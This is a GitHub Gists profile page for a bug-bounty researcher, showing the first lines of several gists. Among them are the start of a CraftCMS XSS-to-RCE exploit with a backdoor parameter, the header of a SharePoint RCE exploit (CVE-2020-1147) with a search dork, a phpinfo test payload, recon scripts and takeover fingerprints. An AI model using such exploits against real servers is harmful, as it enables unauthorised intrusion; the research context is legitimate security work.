Skip to content

Instantly share code, notes, and snippets.

View 0xcrypto's full-sized avatar
🐢
Building a better world, one line of code at a time

0xcrypto

🐢
Building a better world, one line of code at a time
69 followers · 4 following
View GitHub Profile
@0xcrypto
0xcrypto / exploit.html
Created March 12, 2023 15:08
CraftCMS xss to rce chain exploit
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
// usage: exploitRCE()
function exploitRCE(
adminPanelUrl = '/index.php?p=admin/',
adminPanelDefaultUrl = '/admin/',
backdoor = 'backdoor',
twigTemplateExt = "text/html",
@0xcrypto
0xcrypto / index.twig
Created March 12, 2023 15:06
CraftCMS chain
<h1>{{entry.title}}</h1>
{% set rel = entry.asset.one() %}
{% if rel %}
<p><a href="{{ rel.url }}">{{ rel.filename }}</a></p>
@0xcrypto
0xcrypto / testpage.twig
Created March 12, 2023 14:53
Test page script
{% macro errorList(errors) %}
{% if errors %}
<ul class="errors">
{% for error in errors %}
<li>{{ error }}</li>
{% endfor %}
</ul>
{% endif %}
{% endmacro %}
@0xcrypto
0xcrypto / sdto.json
Last active February 18, 2023 12:55
[
{
"cicd_pass": true,
"cname": ["us-east-1.elasticbeanstalk.com"],
"discussion": "[Issue #194](https://github.com/EdOverflow/can-i-take-over-xyz/issues/194)",
"documentation": "",
"fingerprint": "NXDOMAIN",
"nxdomain": true,
"service": "AWS/Elastic Beanstalk",
"status": "Vulnerable",
@0xcrypto
0xcrypto / rce.php
Created March 9, 2021 15:01
RCE payload test
<?php
echo phpinfo();
exit()
?>
@0xcrypto
0xcrypto / recon.sh
Last active October 20, 2022 00:53
#!/usr/bin/env zsh
rm ~/bugbounty -rf
mkdir ~/bugbounty
cd ~/bugbounty
curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"
cat chaos-bugbounty-list.json | grep '"name"' | awk '{$1=$1};1' | sed 's/"name": "//g' | sed 's/"name":"//g' | sed 's/",//g' | while read folder; do mkdir -p $folder -v; done
for (( i=0; i < $(cat chaos-bugbounty-list.json | jq -r .programs | jq length); i++ ))
do
cat chaos-bugbounty-list.json | jq --arg i "$i" -r ".programs[($i | tonumber)].domains | .[]" > "$(cat chaos-bugbounty-list.json | jq --arg i "$i" -r '.programs[($i | tonumber)].name')/assets.txt" && echo -n "."
@0xcrypto
0xcrypto / keybase.md
Last active August 2, 2022 16:19

Keybase proof

I hereby claim:

  • I am 0xcrypto on github.
  • I am 0xcrypto (https://keybase.io/0xcrypto) on keybase.
  • I have a public key ASCFLpfkpOKtDDLe271f4wv8V-MdNxg139xm1qeXcoXVFAo

To claim this, I am signing this object:

@0xcrypto
0xcrypto / takeover-server.py
Created May 11, 2021 11:35
import json, asyncio, pickle, os
from pathlib import Path
from takeover.takeover import takeover
home = str(Path.home())
# config is an dictionary. See ~/.config/takeover/config.json for structure
config = json.load(open(home + "/.config/takeover/config.json"))
# Do not forget to replace pointer to fingerprints with the valid data. See ~/.config/takeover/fingerprints.json for structure
@0xcrypto
0xcrypto / CVE-2020-1147.py
Created March 18, 2021 04:43
SharePoint Authenticated (Low Privileged) RCE Exploit
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
@0xcrypto
0xcrypto / bookmarklet.js
Last active March 17, 2021 12:23
Google Links Extractor (Extracts links from the visible page. Drag to bookmark bar to create a bookmarklet
javascript:alert((function() {links=[];document.querySelectorAll('.yuRUbf').forEach(function (e) {e.childNodes.forEach(function (f) {links.push(f.getAttribute('href'));});});return links;})().join("\n"))